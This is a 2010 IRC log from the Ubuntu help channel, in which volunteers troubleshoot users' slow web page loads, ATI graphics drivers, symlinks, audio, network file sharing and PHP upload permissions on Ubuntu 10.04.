histoJackWaugh: no nothing sucking up cpu01:15
BluesKajno need , using google-chrome , chromium isn't working properly  on my laptop , j800r01:16
soreauhisto: It could be the nameserver01:16
JackWaughhisto: is one of them farther away from the router than the other?  Are there radio barriers, such as metal cabinets?01:16
histoIt's strictly a problem with resolving download speeds are equal but if I go to a webpage with images etc.. it take for ever.01:16
j800rBluesKaj, where did you get it from?01:16
histoBoth computers are using the same dns01:16
j800rif you didn't get it from the main repos, that's your problem01:16
histoJackWaugh: soreau they are sitting right next to each other01:16
j800rchromium i mean01:16
soreauhisto: Do 'cat /etc/resolv.conf' on linux and compare it to the nameserver being used in the other OS01:16
histosoreau: they are the same01:16
seb_can someone help i'm having trouble installing hardware drivers, i'm not getting anything in my hardware drivers program......????01:17
histosoreau: JackWaugh i've even tried swithing nameservers on the linux box to see if that was it and its not.01:17
soreauseb_: You don't need proprietary drivers for most hardware01:17
JackWaughhisto: Does "dig" take a long time?01:17
j800rseb_, for what? wireless? graphics?01:17
switch10j800r: this is the exact reason that i use browser based email.  and ive even gotten gmail integrated with that exact menu you are talking about:  http://u-bunted.blogspot.com/2010/05/how-to-integrate-gmail-notifier-to.html01:17
seb_j800r: wireless and graphics01:17
seb_j800r: wireless and graphics01:17
histoJackWaugh: dig on google.com was 17msec and second times was 2msec after my dns caching server picks it up01:18
seb_j800r: i tried a few tutorials but i keep getting trouble01:18
j800rseb_, what's your GPU?01:18
BluesKajj800r, http://www.google.com/chrome?platform=linux&hl=en01:18
JackWaughhisto: So it isn't the DNS lookup.01:18
brandyI'm trying to get alsa/pulseaudio devices to play audio over my HDMI output, but having issues.  I can get sound to play over it using the following command, but no other way: mplayer -ao alsa:device=hdmi=0 /usr/share/sounds/alsa/Side_Left.wav01:18
demifurorguys, does anyone have any experience using the ps3 media server script? im trying to make mine autostart, but it fails to initialize properly and it gives me a message like Unable to retrieve MAC address for UUID creation: using a random one...01:18
j800rBluesKaj, i'm talking about when you said chromium is unstable for you. where did you get it from01:18
wardedmochacan you install wine through synaptic?01:18
histoJackWaugh: no its almost like content is beign filtered then rendered if that makes sense01:18
seb_j800r: radeon x125001:18
JackWaughwardemocha: yes.01:18
wardedmochaok tnaks01:19
seb_j800r: yep01:19
wardedmochahow do you use wine01:19
j800rATI cards are often troublesome in Linux01:19
seb_j800r: i know01:19
j800rwardedmocha, what do you need Wine for? gaming?01:19
JoeTheGuesthttp://www.pcworld.com/article/198686/linux_trojan_raises_malware_concerns.html ahhhhhh!!!01:19
wardedmochaitunes and google chrome01:19
JackWaughhisto: Is it the case that the bigger the page is, the longer it takes to fetch?01:19
histoJackWaugh: for example break.com took 16 seconds to load on the linux box.  Takes 2 seconds on the windows box right next to me01:19
j800rno you don't01:19
wardedmochaand yes a game01:19
BluesKajj800r, no i installed chromium from the repos and it's not acting properly , I can't edit my igoogle home page gadgets01:19
histoJackWaugh: nah they all seem to take about 10-15 seconds01:20
JackWaughhisto: Try timing it with "curl".  That will take the browser out of the picture.01:20
JoeTheGuesthttp://www.pcworld.com/article/198686/linux_trojan_raises_malware_concerns.html ahhhhhhhh the world is ending01:20
j800rwardedmocha, install chromium browser from the ubuntu repos, and use rhythmbox to replace iTunes01:20
soreauseb_: That gpu is not currently supported by any proprietary driver. The radeon driver should already be working OOTB01:20
wardedmochawhat about the game01:20
soreauseb_: More specifically, fglrx dropped support for that card over a year ago01:20
j800rwell then yes, i'd recommend Wine or Play On Linux01:20
seb_soreau: why?01:21
histoJackWaugh: installing it now01:21
j800rbut check the Wine DB first for compatibility issues01:21
slimjimflimi'm trying to do this: b/c jack broke my audio01:21
soreauseb_: I have no idea.01:21
wardedmochacan i use chromium and ubuntu at the same time?01:21
slimjimflimBe aware though automatically starting JACK can cause the daemon (jackd) and/or the GUI (qjackctl) to crash/freeze if device settings change between two sessions (for example, a USB soundcard can get different device numbers across sessions). If so, set the appropriate entry (autolaunch) to 0 in the ~/.jackdrc file, qjackctl should work again.01:21
histoJackWaugh: usage on curl?01:21
JackWaughhisto:  This all sounds strange.  I'm trying to imagine what part of the process takes a fixed amount of time regardless of the file size, but isn't the DNS lookup.  Making the initial http: connection, maybe.01:21
slimjimflimbut i can't find the autolaunch variable in that file01:21
j800rwardedmocha, chromium is ON ubuntu. and it's an alternative to google chrome. basically the open source version01:21
seb_soreau: i just can't get my control center going01:21
slimjimflimanybody know how to fix this?01:21
wardedmochahow would i go about getting that01:21
j800ryou'll notice virtually no difference. even addons are still installed01:21
j800rwardedmocha, two choices01:22
JackWaughhisto: curl an_url >output_file01:22
histoJackWaugh: thats what it looks like each connection takes a while01:22
seb_soreau: and the acceleration is obviously not working well01:22
soreauseb_: The control center is part of the proprietary driver and cannot be used with your card01:22
j800rin terminal " apt-get install chromium-browser"01:22
demifurorcan someone please help with the issue ive mentioned above?01:22
soreauseb_: What 3D isn't working well?01:22
j800ror search for it in software manager01:22
JackWaughhisto: time curl an_url >/dev/null01:22
j800rof course, this is assuming you're running Ubuntu 10.0401:22
seb_soreau: what about if i use the driver they give on the ati site01:22
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wardedmochaand that will just install google chrome basically01:22
j800rwell, kinda.01:23
JackWaughCan anybody else think of why making an http: connection would take a long time?01:23
braxtonCan someone help me with symlinks?01:23
seb_soreau: the 3d effect with the my windows for example01:23
soreauseb_: That is the proprietary/catalyst/fglrx driver which does not support your card at all any more01:23
JackWaughbraxton: be specific.01:23
braxtonAre they just folders that point to another location?01:23
j800rwardedmocha, can i pm a link to you. i have a small screencast on Chromium that will help explain it01:23
soreauseb_: You cannot use fglrx with that card unless you use a very old version of ubuntu01:23
wardedmochacould ayou do that01:23
switch10braxton: yes, basically.01:23
JackWaughbraxton: they are entries in a directory, and they point to a folder or any other kind of file, even another symlink.01:23
braxtonHow do I make them with the terminal?01:24
seb_soreau: that seriously sucks01:24
seb_soreau: the're must be some kind of alternative01:24
JackWaughbraxton: ln -s pathname-to-point-to where-you-want-the-link01:24
soreauseb_: The radeon driver should already be working decently and is getting better all the time (now that amd bought ati and began releasing hw specs which enables the open driver developers to create better drivers)01:24
wardedmochahey will you pm me that thing01:24
JackWaughbraxton:  A symlink can be relative or absolute.01:24
soreauseb_: The radeon driver *is* the driver you want to use for that card01:24
histoJackWaugh: time curl break.com > /dev/null took 21.287s01:25
switch10braxton: ln01:25
seb_soreau: what should i look for in synaptic?01:25
adsoncomando ls01:25
seb_soreau: radeon fg..01:25
JackWaughhisto: That's also about how long it takes in the browser?01:25
seb_soreau: ?01:25
histoJackWaugh: yes01:25
soreauseb_: First, show the output of 'glxinfo|grep renderer'01:25
fk91Hello, I have successfull deleted grub2. After installing grub1 the cmd update-grub should create the menu entries, but only memtest86 was found. But in /boot should be the ubuntu kernel?01:25
seb_soreau: how do i do that?01:26
histoJackWaugh: although google and yahoo are timing like 2 seconds now with curl01:26
JackWaughhisto:  For me it took only 1.4 sec.01:26
soreauseb_: 1) Open a terminal 2) Type 'glxinfo|grep renderer' (without tick marks) 3) Press enter 4) Post the line it gives you back here01:26
soreau! terminal | seb_01:26
ubottuseb_: The linux terminal or command-line interface is very powerful. Open a terminal via Applications -> Accessories -> Terminal (Gnome) or K-menu -> System -> Konsole (KDE).  Guide: https://help.ubuntu.com/community/UsingTheTerminal01:26
histoJackWaugh: yeah youtube jsut took 2.241 seconds01:26
JackWaughhisto: Maybe if you do "man curl", you will find a way to make it give details about the interaction over the network.01:27
histoJackWaugh: loading in a browser takes about 20 seconds though01:27
seb_soreau: how do i do that straight line?01:27
JackWaughDoes anyone else have an idea why histo is seeing these kinds of timings?01:27
soreauseb_: It's |, key just about enter. But you can also just copy/paste the command01:28
histoJackWaugh: many people have complained of slow browsing on ubuntu on the forums but the only solution i've seen posted is disabling ipv601:28
JackWaughThen why doesn't it happen to me?01:28
seb_soreau: X Error of failed request:  BadRequest (invalid request code or no such operation)01:28
seb_  Major opcode of failed request:  135 (GLX)01:28
seb_  Minor opcode of failed request:  19 (X_GLXQueryServerString)01:28
seb_  Serial number of failed request:  1601:28
seb_  Current serial number in output stream:  1601:28
FloodBot2seb_: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.01:28
braxtonI don't really understand the command ln.01:29
braxtonWhat are the arguments again?01:29
BrayMaillouxAfternoon. I'm using a Lenovo Thinkpad 2746. The laptop is REALLY hot and the fan is working overtime. I'm using 10.04 (Lucid) with 2.6.32-22-generic.01:29
braxtonSorry for the noobishness.01:29
JackWaughbraxton: Shall we have a chat about it just the two of us?01:29
braxtonJackWaugh, that sounds lovely, yes.01:29
switch10braxton: man ln01:29
demifurorguys, how can i delay the execution fo a script until AFTER my wireless is connected01:30
switch10braxton: you should only need  the -s argument01:30
seb_soreau: should i paste in pastebin next time?01:30
soreauseb_: No, one line is fine01:30
braxtonswitch10, I am aware of the man pages.01:30
seb_soreau: did you get what i sent?01:30
switch10braxton: you dont understand the man pages??01:30
histoJackWaugh: I don't know b ut i'm definately experiencing it01:31
seb_soreau: it gave me a few lines01:31
soreauseb_: Ok so you have fglrx installed. You need to remove it. 1) Look at the output of 'dpkg -l|grep fglrx' and remove all packages with 'ii' next to them 2) If you used some other method, look in /usr/share/ati/ for an uninstall script and run that 3) Reinstall libgl1-mesa-glx and libgl1-mesa-dri packages after removing fglrx 4) Finally, reboot01:31
switch10braxton: the easiest way to learn how to use ln.01:31
histoJackWaugh: I don't think curl is downloading images and stuff though just code01:31
switch10braxton: but like i said you should only need the -s option for symbolic link.01:32
BrayMaillouxI opened System Monitor and my first core is running at 100%01:32
demifurorguys how can i tell a scritp to wait until wlan0 is connected?01:32
JackWaughhisto:  That's right, it doesn't follow any references as a browser would.01:32
histoJackWaugh: well thats definately where the slow down is01:32
BrayMaillouxAnd the process list does not make mention of any process using 100% of the processor.01:32
JackWaughhisto: so try each individual image and find the slow one.01:32
histoJackWaugh: They are all slow01:33
seb_soreau: amdcccle would this be a uninstall script?01:33
histoJackWaugh: thats whats taking 20 seconds.  I can take a video but I need somewhere to post it01:33
BrayMaillouxOk... no the 100% load has shifted over to processor two.01:33
meoblast001hi, i have a bit of a problem, i installed some perl stuff on my server, but all i'm seeing is the file contents... i installed libapache2-mod-perl01:34
Appl6BrayMailloux: "top" in a terminal.01:34
scorpcan anyone lelf me create a local network for my linux systems01:34
histoJackWaugh: i've tried firefox and chrome both have the same behavior01:34
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histoJackWaugh: Even my ipod renders pages faster01:35
unopmeoblast001, you're trying to execute some perl scripts? but you see the scripts' contents instead?01:36
kevinrHello, I installed Ubuntu 10.04 i386 Server edition today and installed Gnome using sudo apt-get install ubuntu-desktop; the download went fine and i rebooted to the ubuntu login screen. But when i enter the correct password it loops back to sign in. Any thought01:36
JackWaughhisto:  Maybe you will get a clue of some use or other if you try getting each individual picture (using curl) and the style sheet, and see whether just one of those is slow.01:36
meoblast001unop: yes01:36
meoblast001unop: it's bugzilla01:36
scorpdoes anyone know how to set up a network where i can share files with my other linux computers01:36
unopmeoblast001, you'll need to either setup mod_perl for your virtualhost -- or configure execCGI to tell apache what is executable01:37
freezwayhey, I reinstalled ubuntu and cant get the same resolution, i dont think it detects my monitor correctly01:37
Shapeshiftrif I want to run a mail server, should I get ubuntu or ubuntu server?01:37
meoblast001unop: i have libapache2-mod-perl201:37
kevinrscorp if you are looking for a vet simple answer you could use a program named dropbox 2gigs a month free01:37
meoblast001set it up for the virtual host... i don't use virtual hosts01:37
seb_soreau: i'm using synaptic to uninstall01:37
unopmeoblast001, yes, that's only the package - you'll need to define how mod_perl is used01:37
seb_soreau: thanks for you help i'm pretty sure it will be good now01:37
scorpkevinr, well how exactly does that work01:38
Shapeshiftrso, Ubuntu or Server?01:38
scorpand i would need something that gets a lot more than 2 gb per month01:38
pieroHi! Each time I try to scp files from my desktop to my notebook I get 0%    0     0.0KB/s - stalled, and the files doesn't come. What should be happening? thanks01:38
freezwayhey, I reinstalled ubuntu and cant get the same resolution, i dont think it detects my monitor correctly01:39
kevinrscorp  its a drap and drop file sharing program..but if you need more storage and dont want to pay you will need to set up a network01:39
scorpkevinr,  yea i think i need that network but i dont know how to get it to work on linux01:40
kevinrscorp im looking to do the same..with not very good results so far01:40
scorpi guess ill start with google01:41
kevinr Hello, I installed Ubuntu 10.04 i386 Server edition today and installed Gnome using sudo apt-get install ubuntu-desktop; the download went fine and i rebooted to the ubuntu login screen. But when i enter the correct password it loops back to sign in. Any thought01:41
BrayMaillouxAppl6: Top in a terminal says the Backend process is taking 100% of my CPU load. I ran  /proc/5772/cmdline. It yeiled /usr/bin/python/usr/share/checkbox/backend/tmp/checkboxHxjKEx/input/tmp/checkbox01:41
BrayMaillouxI ran checkbox earlier for some systems tests and terminated prematurely.01:41
bukayooscorp: are the linux computers on the same network?01:41
=== MenZa is now known as baconsnacks
demifurorguys how do i determine my internet gateway that im using? in widnows i would use ipconfig /all01:41
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BrayMaillouxdemifuror: man ifconfig01:41
Jordan_Udemifuror: route -n01:42
scorpthey are all connected to the same router by wire i just need my other computers to recognize each other01:42
MJ94Can Macs run Ubuntu as well as OS X, together?01:42
Jordan_UMJ94: Yes.01:42
Appl6BrayMailloux: If you don't need the process, you can try "kill 5772" (assuming that the PID is 5772).01:42
MJ94Is it difficult/may break OS X?01:42
MJ94Jordan_U: ^^01:43
bukayooscorp: you should be able to in nautilus01:43
freezwayMJ94, difficult IDK most likly not, break OSX almost certainly no01:43
BrayMaillouxAppl6: Should this be reported to the Ubuntu staff?01:43
scorphow do i use nautilus?01:44
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vltShapeshiftr: No difference. If you don't need a desktop you _might_ want to use the server optimised kernel ...01:44
bukayooscorp: not sure exactly bec i use kubuntu01:44
MJ94Knowing me, I'll break it...01:44
DarkDigitalDreamI'm looking for a way to make a bootable usb OS. The catch is I would like changes to persist. I basically want a fully customized computer on a stick. Does anyone know where I can find something like this?01:44
bukayooscorp: nautilus is the gnome file manager..there should be like network places?01:44
Viking667hello. I've edited a file in /etc/init, how do I get init to take notice of that? I think I'm using upstart here (10.04)01:44
Viking667Network Places is an entry up on the menu, isn't it?01:45
Jordan_UMJ94: Installing Ubuntu on a mac is basically exactly the same as installing Ubuntu to a PC with really proprietary hardware.01:46
ubutomBut without setting up shared with nautilus you won't find anything in network places scorp01:46
scorpthis is all greek to me01:46
myrkgreek is awesome01:46
vltscorp: Why not share files via NFS?01:46
ubutomscorp, right click the folder you want to share, then search from another box01:46
myrkim greek01:46
* Viking667 swears, as he has to reboot Linux if he doesn't get an answer01:46
Jordan_UMJ94: That is to say, the don't use much hardware that isn't found on a standard PC, but they tend to choose components that often don't work well with Linux.01:47
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Appl6BrayMailloux: It depends on what you meant by "terminated early".  You can report a bug regardless, but if you killed it by hand it's unlikely that they'll consider it a bug.01:47
pip Hello, I have an old small laptop, Sony PCG-SRX55H, after installing Kubuntu 10.04, the biggest resolution is only 800x600 and it doesn't scale all the screen, why is that ?01:48
BrayMaillouxAppl6 I closed the program by clicking x in the top right hand corner before finishing all the tests. Afterwards, it ate my CPU until killed.01:48
DarkDigitalDreamnm, I think I found what I'm looking for here https://wiki.ubuntu.com/LiveUsbPendrivePersistent01:48
Appl6BrayMailloux: If it isn't listed here: https://launchpad.net/ubuntu/+source/checkbox/+bugs  then report it.01:49
vltpip: Not scaling is caused by your machine's BIOS setting. Why it is only 800x600 in the first place I don't know. What video card is used?01:49
bukayooscorp: last time i used gnome it was easy in nautilus..try them in places->computer->networks..shud be able to see them there01:49
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De[V]oNhi! I'm trying to register to the ubuntu forums, but I have this error: Fatal error: Existing data passed is not an array01:49
De[V]oNCalled set_existing in [path]/register.php on line 42101:49
De[V]oNin [path]/includes/class_dm.php on line 23501:49
scorpbukayoo, sounds like a plan01:50
RCMsomeone can help me? :)01:50
vlt!ask | RCM01:50
ubottuRCM: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)01:50
bukayooscorp: whayt I used to do is have the same userid/pass on the other computers01:50
RCMI installed lamp server01:51
orangegloim trying to partition my hard drive through the disk utility function but it keeps saying that my hard drive is busy... how can i make it "unbusy">??01:51
scorpbukayoo, that sounds good too01:51
RCMon my ubuntu 10.0401:51
vlt!enter | RCM01:51
ubottuRCM: Please try to keep your questions/responses on one line - don't use the "Enter" key as punctuation!01:51
histoJackWaugh: I can't get curl to do it that way01:51
De[V]oNWhere I can post that error or get help?01:51
taulusCan anyone tell me what package I need to download from synaptic for using my nvidia gfx 5000 series card?01:52
bukayooscorp: another way is to install openssh client/server on each computer and this will let you logon to the other computer easily on the command line01:52
RCMand now and I'm testing php files, I wrote a script that would upload a file, but I can't do it, because the path /var/www/ needs admin permissions, there is any way of allow it?01:52
kevinrbukayoo can you repost your suggestion to scorp..im looking for same advice but broswer closed01:52
ajamison5579what is a good blog writting app for ubuntu to write to a WP blog01:52
demifurorguys how can i make the execution of a script wait until my wlan0 is active and working?01:53
bukayoossh <comp-ip-addrs> userid01:53
scorpthis is confusing01:53
momis there a good nsf player for ubuntu?01:53
demifurorguys how can i make the execution of a script wait until my wlan0 is active and working?01:54
momim trying xmms2 but it only plays the first track of the file01:54
bukayookevinr: what i said was computers on the same network are usually found in places-computer-network01:54
kevinrbukayoo thank you01:54
RCMhow can I allow the the php script to upload files through the browser?01:54
bukayookevinr: np01:55
pipvlt, It's an integrated card, kind from Intel, the resolution works fine on Windows01:55
vltpip: `lspci` or `lshw` should tell you more details.01:56
seb_hello anyone my ram is running at 500 mb at the moment and i hardly have anything runningi only have 860 available soo its not so good?? anyone have any idea why?01:56
demifurorguys how can i make the execution of a script wait until my wlan0 is active and working?01:56
pipvlt, Okay01:56
ubutomseb_, unused ram is useless ram01:56
vltseb_: Why do you think using your RAM is not good? What else did you buy it for?01:56
momnsf files01:57
Appl6vlt: That was helpful.01:57
seb_ubutom: well it used to run at 192 mb now at 500mb im wondering why... thats all?01:57
Appl6seb_: Can you pastebin the output of "free -m" please?01:57
demifurorguys how can i make the execution of a script wait until my wlan0 is active and working?01:58
jgonza9600Is there a ubuntu beginner chat?01:58
tomreyndemifuror: there are if.up.d hooks in /etc/network01:58
Appl6jgonza9600: #ubuntu-beginners01:58
chai16can someone help me? i'm trying to compile some source... http://paste.ubuntu.com/449433/01:58
seb_appl6:              total       used       free     shared    buffers     cached01:58
seb_Mem:           875        807         68          0         22        26401:58
seb_-/+ buffers/cache:        520        35501:58
seb_Swap:          956         10        94601:58
FloodBot2seb_: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.01:58
=== skbohra_ is now known as skbohra
demifurortomreyn: what are hooks? how do i use them in a script?01:58
seb_Appl6: sorry i will pastebin that next time01:59
tomreyndemifuror: just bash scripts. have a look at the existing scripts there.01:59
bukayoodemifuror: put a check in the beginning of your script to check wlan01:59
RCMany help?01:59
demifurorbukayoo: yes but how do i put a check in?01:59
demifurorbukayoo: ie what am i checking for?02:00
tomreyndemifuror: i meant to say "shell scripts", not just "bash scripts"02:00
bukayoodemifuror: while wlan0 do script else check again02:00
seb_Appl6: ??02:01
vltRCM: Your wenserver is running as user www-data usually. Make sure that this user is allowed to write to the specific directory.02:01
nullbyteI installed ubuntu 10.04 and the internet is extremely slow. I have a wired connection. when i run "nslookup google.com" it says "no servers could be reached". when i use the browser it is very slow02:01
Appl6seb_: Pastebin "ps -eo pmem,pcpu,rss,vsize,args | { head -1 ; sort -k 1 -r -n ; } | less".02:01
RCMhow do I do that?02:01
tucemiuxhow do you unzap in lucid?02:01
demifurorbukayoo: i understand i need to use a while loop, but is wlan0 a valid check? i.e. does putting "wlan0" in ym script return true/false?02:01
nullbyteanyone know how to fix this?02:02
vltnullbyte: Sounds like you have more than one name servers and the first one doesn't answer. After timeout the next is used. This is what feels slow.02:02
BrayMaillouxAppl6: A bug does appear to exist. It is new and the importance has been undecided.02:02
Appl6BrayMailloux: Link, please.02:03
nullbytehow can i fix that?02:03
vltnullbyte: You'll find the name servers used in /etc/resolv.conf02:03
tomreynchai16: sudo apt-get update && sudo ap-get install libopenal-dev02:03
RCMvlt: how do I do that?02:03
tomreynchai16: you should be asking for support on this where you got the software from02:03
nullbytevlt: i tried editing that file but when i restart networking it gets overwritten02:03
vltnullbyte: Using DHCP?02:03
BrayMaillouxAppl6: http://tinyurl.com/2bzmvoo02:03
seb_Appl6: tell me if you got it not sure o did it right02:04
loki20I fixed my Toshiba Satellite laptop that would not recognize any usb devices except a mouse by updating the bios from 1.3 to 2.3. Just info for anyone with this problem.02:04
chai16tomreyn: i'm pretty sure there isn't support for it anymore, but thank you! i'm trying now02:04
vltnullbyte: Your DHCP server announces name servers. To prevent using these edit /etc/dhcp3/dhclient.conf (look for supersede examples)02:04
tomreynchai16: well this is not #supportforwhatthereisnomoresupportfor but #ubuntu02:05
seb_Appl6: http://paste.ubuntu.com/449435/02:05
nullbytevlt: thanks ill try02:05
varunthackercan someone help me out with this problem http://ubuntuforums.org/showthread.php?t=150510402:05
vltRCM: `chmod o+w /var/www/uploads` for example. man chmod02:06
Appl6BrayMailloux: I don't think there's much you can add to that bug report.  The reporter knows what he's talking about and packagers won't ignore official QA, so you should just watch it (if checkbox is important to you).02:06
Appl6seb_: OK, looking.02:06
RCMokay, thanks02:07
RCMlet me try it02:07
antoniusAnybody have experience with chameleon (os x bootloader?)  I want to set up a dual boot, w/o breaking the default bootloader....I've seen it done.  Maybe install grub to the / partition rather than to MBR?02:07
LiraNunahow can I extract album art from an m4a file?02:08
BrayMaillouxAppl6: It isn't. Thank you for your time.02:08
slimjimflimhi i have this issue:02:09
slimjimflimBe aware though automatically starting JACK can cause the daemon (jackd) and/or the GUI (qjackctl) to crash/freeze if device settings change between two sessions (for example, a USB soundcard can get different device numbers across sessions). If so, set the appropriate entry (autolaunch) to 0 in the ~/.jackdrc file, qjackctl should work again.02:09
vltLiraNuna: You can _try_ mkvextract02:09
slimjimflimbut there's no autolaunch entry in my .jackdrc02:09
slimjimflimthere's nothing about it on google02:10
slimjimflimcan anybody help?02:10
LiraNunavlt, will try02:10
slimjimflimi'm totally stumped02:10
RCMvlt: it worked, thank you!02:10
RCMgood night everyone02:10
Appl6seb_: Nothing looks strange about that memory usage.  I'm very surprised that your system was ever running at 192 MB of RAM with firefox and GNOME.02:10
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seb_Appl6: my CPU also seems to be running high for the little i'm doing..02:10
seb_Appl6: really?02:10
undecimIs there a web page that will connect to this channel with a java or flash app?02:11
pr4bhhi everyone02:11
seb_Appl6: i might not have bin running firefox but gnome was definitivly rinning02:11
slimjimflimundecim: just google irc java02:11
turgonhello, i have a problem concerning my wireless connection: it is connecting only when i am very close to the router02:12
LiraNunavlt, I don't think that'll work02:12
undecimslimjimflim: I thought there was a web page that would automatically log in as a guest to this channel. I think I stumbled onto one once, but can't find it.02:12
seb_Appl6: im using system moniter by the way02:12
tomreynvarunthacker: are you alphageek89 ont hose forums?02:13
nibblynnullbyte, maybe you can also try to set your connection to Automatic DHCP adresses only in network-manager and specify a public DNS server02:13
vltLiraNuna: My next try would be ffmpeg02:13
slimjimflimundecim: oh idk02:13
LiraNunavlt, ffempg is an encoder however02:13
varunthackertomreyn: yes02:13
vanvandoes anyone know how to install jdk on ubuntu ?02:13
Appl6seb_: Yeah, Ubuntu is very heavy as far as Linux distributions go.  If you see your system running at 192 MB again though, I'd be happy to take a look at the output of "ps -eo pmem,pcpu,rss,vsize,args | { head -1 ; sort -k 1 -r -n ; }" again.02:13
vltLiraNuna: It can extract single tracks from container files. Maybe it supports "attachments" like albzm arts too.02:14
vanvani typed sudo apt-get install sun-java6-jdk02:14
LiraNunavlt, let's try then02:14
vanvanand it doesn't work02:14
ubottuTo install a Java runtime on Ubuntu, see https://help.ubuntu.com/community/Java. For the Sun Java products and browser plugin, search for the sun-java6- packages in the !partner repository on Lucid (which must be enabled), or !multiverse repository on older releases.02:14
seb_Appl6: i will definitivly try to get back to you if it happens again02:15
tomreynvarunthacker: so websites you cannot access are piratebay.org and others. can you provide some others? you can send them by /query (PM) if you like, but please let's continue here later.02:15
slimjimflimvlt: what are you trying to do?02:15
turgonhello, i have a problem concerning my wireless connection: it is connecting only when i am very close to the router02:15
seb_Appl6: so 500 mb is normal then?02:15
tomreynvarunthacker: piratebay.org is not a particularly good site for testing against since it happens to be down regularly02:15
pipvlt, Hi, it's Intel 82815 graphic card02:15
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seb_Appl6 : im also surprized at the cpu running at 25% for each core considering i have a dual core02:16
Appl6seb_: Mine is usually at 2.5 GB, but that's because I run a lot of junk.  Maybe someone else will have more normal usage than I do.02:16
varunthackertomreyn, i can't even visit my blog :http://varunthacker.wordpress.com/02:16
nihilistzaman, copying via mc + gvfs = cpu fail02:16
Appl6seb_: Pastebin "top -n 1".02:17
vltslimjimflim: I'm trying to search for an exact string on an html page using chromium, trying to edit a text object in scribus and changing a 2038+ date from wrong exif timestamp w/o crashing f-spot ;-)02:17
seb_Appl6: lol okay its just i onlyhave 1gig of ram and nothing running hardly02:17
=== Gordon is now known as Gordon2
Gordon2hello is there a help channel?02:18
acovrigcan anyone help with a dansguardian configuration?02:18
vltGordon2: welcome to it ;-)02:18
tomreynvarunthacker: what'S the error message firefox gives you?02:18
Appl6seb_: Well, using the previous command I gave you for the memory usage, you can look at the RSS column (which is memory used by process in KB) and see what processes are using up all your memory.02:18
pipI want to uninstall KDE desktop environment, what's the best way to do that ?02:18
slimjimflimhi pip02:19
vltpip: `sudo aptitude remove kubuntu-desktop`02:19
pipslimjimflim, Hi :D02:19
Gordon2thank u :) I have a question. I'm new to Ubuntu02:19
seb_Appl6: http://paste.ubuntu.com/449439/02:19
vlt!ask | Gordon202:19
ubottuGordon2: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)02:19
slimjimflimpip: you just want to have cli?02:19
pipslimjimflim, NO, I want to install gnome to have a try02:19
nihilistzapip, don't forget to sudo apt-get install ubuntu-desktop ;)02:20
vltpip: aptitude install ubuntu-desktop (no need to uninstall kde before)02:20
varunthackertomreyn: its still loading up... on the bottom left cornor it says waiting for s0.wordpress.com . And i have realized i cannot visit ant wp hosted blogs02:20
pipslimjimflim, I just installed KDE, but the resolution is only 800x600 without scaling the full physical screen :S02:20
acovrigcan anyone help with a dansguardian configuration?02:20
seb_Appl6: im not sure i have an rss column02:20
vlt!cn | enjo02:20
ubottuenjo: For Ubuntu help in Chinese 您可以访问中文频道: #ubuntu-cn 或者 #ubuntu-tw  或者 #ubuntu-hk02:20
Gordon2I played a bit with the resolutions of my laptop and the TV out. Now I have to problems, 1) the resolution of the boot screen has changed and 2) the panel in the upper side has changed. is there a way to restore it as it was in the installation? thank you02:21
pipvlt, so I will have both of them ?02:21
vltpip: Yes, no problem02:21
turgoncan someone tell me how to get the name of my wireless card?02:21
pipvlt, I could not start network manager within KDE, it just doesn't start itself02:21
slimjimflimturgon: lspci02:21
seb_Appl6: is it me or does it look like hardly any memory is being used02:21
slimjimflimthen look for the word wireless02:21
seb_Appl6: do you think my monitor could be badly working?02:22
pipI wanna manually config it02:22
turgonslimjimflim: i tried lspci | grep wireless   ... didnt get anything :S02:22
slimjimflimturgon: can you pastebin the result?02:22
turgonslimjimflim: sure, can u though tell me how ? i'm new :)02:23
vltturgon: The device name? try `ifconfig -a`02:23
root__i have a question about my wireless connection02:23
slimjimflimturgon: highlight everthing that resulted from that command, right click and click copy02:23
slimjimflimthen go to http://pastebin.com and paste the result in there02:23
slimjimflimright click and click paste02:24
vlt!ask | root__02:24
ubotturoot__: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)02:24
slimjimflimturgon: then submit it and copy and paste the resulting url in here02:24
=== root__ is now known as Xiant
seb_Appl6 : could it be my monitor is telling me the wrong thing?02:25
turgonslimjimflim: http://pastebin.com/sx3RF4zS   i guess :P02:25
nibblynseb_, are you on lucid?02:25
tomreynvarunthacker: please close all firefox windows, then open a terminal window and type this: firefox -no-remote -safe-mode http://varunthacker.wordpress.com/02:25
Appl6seb_: The monitor itself actually takes a lot of CPU.02:25
tomreynvarunthacker: then, _without_ ticking any of the checkboxes, click on "continue in safe mode"02:26
slimjimflimturgon: perfect02:26
tomreynvarunthacker: does your website fully load then?02:26
turgonvlt: should i look in wlan0 or eth0 ?02:26
turgonslimjimflim: gr8 :)02:27
vltturgon: Depends on what interfaces your machine has.02:27
turgonvlt: what do u mean by interface? ... i guess.. wireless02:27
vltturgon: Does it have a wired network card? Then this propabyl is eth002:27
BrayMailloux I'm looking to get started with C in linux. Does anyone have a recommended E-book?02:28
tucemiuxanyone knows how to install the wireless utility?  It's not showing up on my laptop02:28
slimjimflimturgon: it's this: http://www.intel.com/design/chipsets/datashts/290655.htm02:28
seb_nibblyn: no on karmic02:28
slimjimflimturgon: it was this entry: http://www.intel.com/design/chipsets/datashts/290655.htm02:28
turgonvlt: yup it has a wired card...02:28
slimjimflim00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 93)02:29
slimjimflimthat one i mean02:29
FloodBot2slimjimflim: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.02:29
acovrigcan anyone help with a dansguardian configuration?02:29
tucemiuxBrayMailloux, go into #ubuntu-offtopic or ask around in the programming channels02:29
pandoraguys i need to go from linux computer to linux computer to share massive files on my network but i cant see my other computers on my network02:29
turgonslimjimflim: how did u figure it out?02:29
slimjimflimturgon: cause it says mobile02:29
Kane_Hartare ati cards the same under linux bad performance hardly working right? not sure but nothing has changed or anything special lets say over the last 4-5 months?02:29
vlt!nfs | pandora02:30
ubottupandora: nfs is the network file system. See https://help.ubuntu.com/community/SettingUpNFSHowTo for information on installing and configuring NFS.02:30
turgonslimjimflim: aha.. and what does mobile imply? network?02:30
slimjimflimturgon: 82801 is the model number for your chipset02:30
